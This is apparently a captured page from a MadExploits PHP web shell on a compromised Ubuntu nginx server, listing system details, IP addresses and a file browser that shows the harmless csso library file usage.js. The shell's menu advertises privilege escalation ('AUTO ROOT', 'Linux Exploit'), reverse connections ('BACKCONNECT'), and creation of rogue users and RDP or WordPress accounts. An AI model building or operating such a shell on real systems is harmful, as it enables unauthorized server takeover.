Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amatya /
node_modules /
csso /
lib /
[ HOME SHELL ]
Name
Size
Permission
Action
clean
[ DIR ]
drwxr-xr-x
replace
[ DIR ]
drwxr-xr-x
restructure
[ DIR ]
drwxr-xr-x
compress.js
5.13
KB
-rw-r--r--
index.js
3.39
KB
-rw-r--r--
usage.js
1.6
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : usage.js
var hasOwnProperty = Object.prototype.hasOwnProperty; function buildMap(list, caseInsensitive) { var map = Object.create(null); if (!Array.isArray(list)) { return null; } for (var i = 0; i < list.length; i++) { var name = list[i]; if (caseInsensitive) { name = name.toLowerCase(); } map[name] = true; } return map; } function buildList(data) { if (!data) { return null; } var tags = buildMap(data.tags, true); var ids = buildMap(data.ids); var classes = buildMap(data.classes); if (tags === null && ids === null && classes === null) { return null; } return { tags: tags, ids: ids, classes: classes }; } function buildIndex(data) { var scopes = false; if (data.scopes && Array.isArray(data.scopes)) { scopes = Object.create(null); for (var i = 0; i < data.scopes.length; i++) { var list = data.scopes[i]; if (!list || !Array.isArray(list)) { throw new Error('Wrong usage format'); } for (var j = 0; j < list.length; j++) { var name = list[j]; if (hasOwnProperty.call(scopes, name)) { throw new Error('Class can\'t be used for several scopes: ' + name); } scopes[name] = i + 1; } } } return { whitelist: buildList(data), blacklist: buildList(data.blacklist), scopes: scopes }; } module.exports = { buildIndex: buildIndex };
Close